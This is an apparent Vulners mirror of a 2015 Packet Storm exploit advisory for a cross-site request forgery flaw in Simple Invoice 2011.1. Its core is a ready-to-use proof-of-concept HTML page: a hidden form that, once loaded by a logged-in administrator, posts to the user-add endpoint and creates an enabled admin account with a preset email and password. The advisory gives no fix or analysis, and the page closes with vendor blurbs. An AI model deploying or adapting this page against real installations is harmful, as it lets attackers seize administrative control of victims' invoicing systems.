Lucene search
K

Simple Invoice 2011.1 Cross Site Request Forgery

🗓️ 20 May 2015 00:00:00Reported by ProvensecType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 24 Views

Simple Invoice 2011.1 Cross Site Request Forgery vulnerability on simpleinvoices.or

Code
`# Affected software: simple invoice  
# Type of vulnerability:adding admin user via csrf  
# URL:simpleinvoices.org  
# Discovered by: provensec  
# Website: provensec.com  
  
#version:2011.1  
# Proof of concept  
  
<html>  
  
<body>  
<form action="  
http://demo.simpleinvoices.org/index.php?module=user&view=add"  
method="POST">  
<input type="hidden" name="email" value="[email protected]" />  
<input type="hidden" name="role" value="1" />  
<input type="hidden" name="password_field" value="lalala123@"  
/>  
<input type="hidden" name="enabled" value="1" />  
<input type="hidden" name="submit" value="Insert User" />  
<input type="hidden" name="op" value="insert_user" />  
<input type="submit" value="Submit request" />  
</form>  
</body>  
</html>  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation